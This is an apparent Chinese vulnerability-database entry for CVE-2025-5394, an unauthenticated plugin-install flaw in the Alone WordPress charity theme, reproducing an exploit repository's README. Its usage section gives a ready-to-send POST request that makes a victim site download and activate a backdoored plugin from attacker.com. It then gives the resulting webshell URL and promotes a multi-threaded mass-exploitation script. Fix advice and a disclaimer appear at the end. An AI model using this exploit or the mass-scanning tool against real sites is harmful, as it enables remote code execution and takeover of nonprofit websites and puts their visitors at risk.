Alone – Charity Multipurpose Non-profit WordPress Theme 未授权任意文件上传漏洞

漏洞信息

漏洞名称： Alone – Charity Multipurpose Non-profit WordPress Theme 未授权任意文件上传漏洞

漏洞编号：

• CVE： CVE-2025-5394

漏洞类型： 文件上传

漏洞等级： 严重

漏洞描述： 受影响产品: Alone是一款专为非营利组织和慈善机构设计的WordPress主题，广泛用于创建捐赠、活动和志愿者管理网站。由于其多功能性和易用性，它在全球范围内被广泛部署，特别是在需要快速搭建专业网站的非营利组织中。

漏洞解释: 该主题在7.8.3及之前版本中存在一个未授权任意文件上传漏洞，类型为文件上传。漏洞的技术根源在于beplus_import_pack_install_plugin函数通过wp_ajax_nopriv_暴露给公众，没有进行任何身份验证或能力检查。该函数允许从未经身份验证的用户提供的URL安装和激活插件，从而导致攻击者可以上传恶意插件ZIP文件，实现远程代码执行（RCE）。

影响分析: 此漏洞允许未经身份验证的攻击者上传任意文件，包括恶意插件，从而导致远程代码执行和完整的网站被入侵。由于攻击不需要任何形式的认证，且可以通过自动化工具大规模利用，因此风险极高。攻击者可以利用此漏洞植入后门，窃取敏感数据，或进一步攻击网站访问者。此外，由于WordPress的广泛使用，此漏洞的影响范围可能非常广泛，特别是在未及时更新的网站上。

产品名称： Alone – Charity Multipurpose Non-profit WordPress Theme

影响版本： <= 7.8.3

来源： https://github.com/Yucaerin/CVE-2025-5394

类型： CVE-2025:github search

仓库文件

• README.md
• mass_beplus_exploit.py

来源概述

CVE-2025-5394 – WordPress Alone Theme <= 7.8.3 - Unauthenticated Arbitrary File Upload via Plugin Installation

🔥 Vulnerability Summary
The WordPress theme Alone versions <= 7.8.3 is vulnerable to an unauthenticated arbitrary file upload vulnerability. This flaw allows unauthenticated attackers to upload and install arbitrary plugin ZIP files from remote URLs via an unprotected AJAX endpoint — resulting in remote code execution (RCE) by deploying backdoored plugins.

This vulnerability stems from the beplus_import_pack_install_plugin function exposed to the public via wp_ajax_nopriv_ without any authentication or capability checks. The function installs and activates a plugin from a user-supplied URL.

🔍 Affected Theme

• Theme Name: Alone – Charity Multipurpose Non-profit WordPress Theme
• Affected Version: <= 7.8.3
• Vulnerability Type: Unauthenticated Arbitrary File Upload → RCE
• CVE ID: CVE-2025-5394
• CVSS Score: 9.8 (Critical)
• Impact: Full remote code execution (RCE) and full site compromise

🧪 Exploit Features

• 🔓 No authentication required
• 📦 Uploads malicious plugin ZIP directly from remote URL
• 🚀 Automatically installs and activates the plugin
• 🐚 Webshell delivery supported via embedded PHP in plugin
• ✅ AJAX endpoint accessible by unauthenticated users:
  /wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin

🧠 Researcher

• Credit: Thai An

🚀 Usage

1. Prepare a malicious plugin ZIP file hosted on a server you control.

   • Must contain a valid plugin header (Plugin Name:) and PHP backdoor (e.g., bk.php)

2. Craft the following POST request:

   POST /wp-admin/admin-ajax.php HTTP/1.1
   Host: victim.com
   Content-Type: application/x-www-form-urlencoded
   
   action=beplus_import_pack_install_plugin&
   data[plugin_slug]=hello-dolly&
   data[plugin_source]=https://attacker.com/hello-dolly.zip

3. If successful, the plugin is installed and activated. Access your shell at:

   https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id

🧰 Mass Exploitation Script
This repository includes a mass exploit tool with:

• Multi-threaded processing
• Automatic HTTPS prefixing (if missing)
• Live logging of successful targets to result.txt

See mass_beplus_exploit.py for details.

🛠 Fix Recommendations

• Theme authors should remove or secure the wp_ajax_nopriv_beplus_import_pack_install_plugin hook.
• Implement authentication/capability checks (e.g., current_user_can('install_plugins'))
• Validate and restrict plugin sources.
• Use a Web Application Firewall (WAF) to block unauthorized admin-ajax access.

🔒 Disclaimer:
This information is provided for educational and authorized security testing purposes only. Unauthorized access or use of computer systems is illegal and unethical.

📚 Reference:

• Wordfence Advisory – CVE-2025-5394

CVE: CVE-2025-5394
Researcher: Thai An